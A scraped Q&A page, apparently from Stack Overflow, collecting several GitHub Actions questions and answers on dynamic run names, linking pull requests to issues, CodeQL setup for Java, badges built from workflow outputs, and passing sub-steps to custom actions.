I have a manually triggered job that builds and deploys an image based on the tag I specify. Is there a way to make the workflow name dynamic?
name: Build and push
on:
workflow_dispatch:
inputs:
tag:
description: 'Image Tag'
required: true
jobs:
...
I would like to do something like
name: "Build and push ${{ github.event.inputs.tag }}"
As of Sep 26th 2022, this is now supported. Here's the announcement (which contains a link to the documentataion): https://github.blog/changelog/2022-09-26-github-actions-dynamic-names-for-workflow-runs/
Workflow names are not dynamic, but fixed.
To get at the actual data of a workflow run, you'll have to chose the specific run from the Actions > All Workflows > [name-of-your-workflow] list.
Alternatively, you can think about other ways to propagate the outcomes of your builds.
Our team, for example, propagates build outcomes to teams chat channel (in our case Microsoft Teams using the action notify-microsoft-teams). If you search the market place you'll find plenty of actions for this.
Another alternative could be to generated custom badges, which you could then make visible to your team. A nice action for this is bring-your-own-badge.
Last but not least you can propagate your workflow run data using emails (again, there are actions which do this for you).
Related
I'm quite a rookie with GitHub Actions so this might be a stupid question: Is there a way to link pull requests with issues (in the UI linked PRs are shown under Development) in Github Actions using Github CLI or octokit/rest.js via actions/github-script?
enter image description here
Background: there is a workflow that creates pull requests. That works fine, only thing missing is the link between issues and corresponding pull requests. I would prefer not to use keywords nor other custom actions from the marketplace.
I've searched in the octokit/rest.js documentation https://octokit.github.io/rest.js/v19 under Issues and Pulls as well as in the GitHub cli documentation https://cli.github.com/manual/gh but couldn't find a solution.
I would like to have a solution either using GitHub Script https://github.com/marketplace/actions/github-script
or the command line.
You can use the Add an issue link Action for that.
This Action allows linking issues to Pull Requests. For example:
name: 'Issue Links'
on:
pull_request:
types: [opened]
jobs:
issue-links:
runs-on: ubuntu-latest
permissions:
pull-requests: write
steps:
- uses: tkt-actions/add-issue-links#v1.8.1
with:
repo-token: '${{ secrets.GITHUB_TOKEN }}' # required
branch-prefix: 'issue-' # required
This workflow will trigger on Pull Request open and link related issues mentioned in the PR body.
Make sure to set the corresponding permission for the job:
permissions:
pull-requests: write
For more about these permissions visit the Permissions for the GITHUB_TOKEN.
I am new to CodeQL and therefore my apologies if my question is an obvious one, however, I've been unable to understand a few simple concepts.
Firstly, I can easily configure a public repo with a github action using a yml file configured as follows:
on:
push:
branches: [ master ]
pull_request:
# The branches below must be a subset of the branches above
branches: [ master ]
jobs:
analyze:
name: Analyze
runs-on: ubuntu-latest
permissions:
actions: read
contents: read
security-events: write
strategy:
fail-fast: false
matrix:
language: [ 'java' ]
# CodeQL supports [ 'cpp', 'csharp', 'go', 'java', 'javascript', 'python', 'ruby' ]
# Learn more about CodeQL language support at https://aka.ms/codeql-docs/language-support
steps:
- name: Checkout repository
uses: actions/checkout#v3
# Initializes the CodeQL tools for scanning.
- name: Initialize CodeQL
uses: github/codeql-action/init#v2
with:
queries: +security-extended
languages: ${{ matrix.language }}
# If you wish to specify custom queries, you can do so here or in a config file.
# By default, queries listed here will override any specified in a config file.
# Prefix the list here with "+" to use these queries and those in the config file.
# Details on CodeQL's query packs refer to : https://docs.github.com/en/code-security/code-scanning/automatically-scanning-your-code-for-vulnerabilities-and-errors/configuring-code-scanning#using-queries-in-ql-packs
# queries: security-extended,security-and-quality
# Autobuild attempts to build any compiled languages (C/C++, C#, or Java).
# If this step fails, then you should remove it and run the build manually (see below)
- name: Autobuild
uses: github/codeql-action/autobuild#v2
# ℹ️ Command-line programs to run using the OS shell.
# 📚 See https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idstepsrun
# If the Autobuild fails above, remove it and uncomment the following three lines.
# modify them (or add more) to build your code if your project, please refer to the EXAMPLE below for guidance.
# - run: |
# echo "Run, Build Application using script"
# ./location_of_script_within_repo/buildscript.sh
- name: Perform CodeQL Analysis
uses: github/codeql-action/analyze#v2
As indicated in the yaml file, I'm using Java as the language. What I'm trying to then do is trigger a failure / alert with a simple code such as this in Java.
public class Main {
public static void main(String[] args) {
// Example code for https://cwe.mitre.org/data/definitions/476.html
String cmd = System.getProperty("cmd");
cmd = cmd.trim();
}
}
This simple code is an example from Common Weakness Enumeration (CWE) 416 where I'm trying to dereference a variable that hasn't been defined.
If I go to Security -> Code scanning alerts it will show that the scanning was performed but not alerts were found.
Basically, I'm wondering if I need to initialize the CodeQL with a specific CWE under the Initialize CodeQL step in the yaml file.
CodeQL only has a specific set of queries, which do not cover all possible CWEs. This list shows the currently covered CWEs for Java.
As far as I know there exists no query at the moment which detects the specific issue you are showing in your question (there are however queries which detect derefencing null). The reason for this is most likely that it would be difficult to prevent false positives. For example if your application is started with -Dcmd, then the system property would not be null. Similarly there could be a call to System.setProperty in a different part of the application which sets the system property to a non-null value.
Besides that you have configured queries: +security-extended but the type of the query you are looking for (assuming it existed) would most likely be in the query suite security-and-quality because it is not directly security related.
You could also try to write your own queries and then include them in the code scanning workflow. Some concepts of CodeQL might feel a bit unfamiliar at first, but they provide great examples and tutorials for getting started. However, you should probably first check if the provided queries already suffice for your use case.
Since May 2022:
Using CodeQL query packs (and its associated CWE coverage, with query specifiers) is still beta, but not going anywhere
its setup has been simplified:
Code scanning can be set up more easily without committing a workflow file to the repository (Jan. 2023)
Code scanning's new default setup feature automatically finds and sets up the best CodeQL configuration for your repository.
This will detect the languages in the repository and enable CodeQL analysis for every pull request and every push to the default branch and any protected branches.
Default setup currently supports analysis of JavaScript (including TypeScript), Python, and Ruby code.
More languages will be supported soon, and all other languages supported by CodeQL continue to work using a GitHub Actions workflow file.
The new default setup feature is available for CodeQL on repositories that use GitHub Actions.
You can use default setup on your repository's "Settings" tab under "Code security and analysis" (accessible by repository admins and security managers).
The options to set up code scanning using an Actions workflow file or through API upload from 3rd party CI/CD systems remain supported and are unchanged.
This more advanced setup method can be useful if you need to alter the default configuration, for example to include custom query packs.
Default setup configurations can also be converted to advanced setups if your analysis requirements change.
Default setup is currently available at the repository level.
We are actively working on future features at the organization level so you can easily set up code scanning at scale across large numbers of repositories.
This has shipped to GitHub.com and will be available in GitHub Enterprise Server 3.9.
To learn more, read the documentation on setting up code scanning for a repository.
In your case, you would still need an Actions workflow file, to specify a query pack.
I have a Github action that sets a name and is run on pull requests:
name: Code Quality
on:
workflow_dispatch:
pull_request:
branches: [ main, develop ]
When I trigger the run manually (because workflow_dispatch is also set), the run will get the title “Code Quality” in the list of runs.
But when the action is run on a pull request, the run name in the list is set to the name of the PR. That may or may not be a good title, very much depending on the PR’s author. Is there a way to influence the title of the action in the list?
Since Sept. 2022, there might be a way to set the title of the run itself:
GitHub Actions: Dynamic names for workflow runs (Sep. 2022)
GitHub Actions customers can now dynamically name their workflow runs.
The new run-name feature will accept expressions and be displayed on the list of workflow runs.
For more information on how to use run-name, visit the documentation.
For questions, visit the GitHub Actions community.
To see what's next for Actions, visit our public roadmap.
You now have:
The name for workflow runs generated from the workflow.
GitHub displays the workflow run name in the list of workflow runs on your repository's "Actions" tab.
If you omit run-name, the run name is set to event-specific information for the workflow run.
For example, for a workflow triggered by a push or pull_request event, it is set as the commit message.
This value can include expressions and can reference the github and inputs contexts.
Example
run-name: Deploy to ${{ inputs.deploy_target }} by #${{ github.actor }}
It does not seem like there is a way to set the title of the run itself (reference).
Scheduled and manual runs will get the title of the workflow, and runs triggered by commit / PR will get the commit message or PR title.
However, notice that the commit / PR title is displayed in addition to the name of the workflow, which appears in two places:
I have a GitHub action workflow that outputs a number and I want to display that in a badge.
Using https://github.com/username/reponame/actions/workflows/myaction.yml/badge.svg I get a red or green failing/success badge but I want to display the number of failures instead, which the workflow outputs into the "errors" output variable.
How can I access that variable in a badge?
There are few options in Github actions marketplace
Bring Your Own Badge - https://github.com/marketplace/actions/bring-your-own-badge
BYOB is a GitHub Action to create badges dynamically based off of GitHub Actions' results, allowing for extremely versatile and easily-maintainable badges.
If you want to use https://shields.io/, consider Dynamic Badges - https://github.com/marketplace/actions/dynamic-badges
This action allows you to create badges for your README.md with shields.io which may change with every commit. To do this, this action does not need to push anything to your repository!
In a subsequent job (step) in the same workflow you could.
I think you want to use your own badge using e.g. https://img.shields.io.
I image you will update e.g. the README file every time the actions are finished, the updating step will be part of the workflow. The transfer of output could be done like here Using output from a previous job in a new one in a GitHub Action.
You will append e.g. the README with a proper svg [](some url).
I created an action to generate a badge from a workflow:
Build-A-Badge - https://github.com/marketplace/actions/build-a-badge
As other users have pointed out, I didn't want any external dependencies or to create new branches on the main repo. So the workaround I used is to store the badge data in the Wiki, which is a separate repository.
Is there any way that a step in a workflow job can specify sub-steps to pass to a custom action?
steps:
- uses: ...
with:
steps:
- ...
- ...
- ...
For example, a uses: actions/cache#v2 will attempt to download a snapshot immediately (in the current step), and also inserts a post step to upload a fresh snapshot after all other steps in the parent job. This works well for build processes that (through multiple stages) intelligently recognise which objects need to be recreated and which do not. But it is not suited for workflows that need to set up a clean environment (or generate test data) that may then be manipulated by the tests. I'd like to make a different cache action, that is explicitly passed instructions for how to regenerate the cache from scratch, and which uploads the state before returning to the following step of the parent action.
Is there any way this could be achieved? (Composite actions? Advanced yaml syntax? Template expressions? Low-level actions toolkits/features? Implementing an interpreter to re-parse the input parameter?)